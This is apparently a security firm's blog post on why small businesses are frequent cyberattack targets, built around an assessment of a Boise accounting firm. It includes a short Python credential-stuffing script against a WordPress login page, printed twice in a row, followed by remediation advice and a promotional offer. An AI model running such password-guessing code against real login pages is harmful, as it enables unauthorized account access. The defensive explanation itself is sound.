← Back to Blog Cybersecurity

Why Small Businesses Are the #1 Target for Cyberattacks

March 4, 2021 · Blackhount · 5 min read

During a recent assessment of a family-owned accounting firm in Boise, we found their entire client database - tax records, SSNs, bank account numbers - accessible from a publicly exposed admin panel with the password set to the company name. Nobody had looked at it in three years.

Large enterprises make the headlines. Small businesses bear the real cost. The accounting firm we assessed is not an outlier - it's the rule. Attackers love small businesses precisely because the defenses are thin and the data is valuable.

What We Actually Find in Small Business Assessments

In nearly every small business engagement, we find at least one of the following within the first hour:

An admin interface exposed to the internet with default or weak credentials
Unpatched software with known CVEs - sometimes years old
No multi-factor authentication on email or cloud accounts
Sensitive files sitting in a publicly accessible cloud storage bucket

A Real Finding: Exposed Admin Panel (OWASP A07 - Identification and Authentication Failures)

On the Boise accounting firm engagement, we discovered a WordPress admin panel at /wp-admin with no account lockout and no MFA. We ran a simple credential stuffing test using a publicly available breach dataset and gained access in under four minutes:

# Simplified credential stuffing simulation
import requests

target = "https://target-site.com/wp-login.php"
credentials = [("admin","admin"),("admin","password"),("admin","companyname2019")]

for user, pwd in credentials:
    r = requests.post(target, data={"log": user, "pwd": pwd})
    if "Dashboard" in r.text:
        print(f"[+] Valid credentials: {user}:{pwd}")
        break
# Result: access gained in attempt #3

# Simplified credential stuffing simulation
import requests

target = "https://target-site.com/wp-login.php"
credentials = [("admin","admin"),("admin","password"),("admin","companyname2019")]

for user, pwd in credentials:
    r = requests.post(target, data={"log": user, "pwd": pwd})
    if "Dashboard" in r.text:
        print(f"[+] Valid credentials: {user}:{pwd}")
        break
# Result: access gained in attempt #3

Fix: Enable MFA, implement account lockout after 5 failed attempts, and use a unique strong password stored in a password manager. For WordPress specifically, limit /wp-admin access by IP at the server level.

You're Also a Supply Chain Target

Many small businesses are vendors or contractors for larger companies. Attackers specifically target the small fish to get upstream access to the big one. In 2020, the SolarWinds attack compromised 18,000 organizations - not by attacking them directly, but by compromising a small software vendor they all trusted. You don't have to be big to be a door.

Start Here

Enable MFA on every account - email, cloud, banking, everything.
Keep all software updated. Enable automatic updates wherever possible.
Use a password manager. One unique password per account.
Know what's exposed. A free security assessment takes two minutes and tells you exactly what attackers can see right now.

Have questions about your security posture?

Blackhount offers free security assessments for Idaho businesses. No commitment, no jargon - just honest answers about what we find.

Get a Free Assessment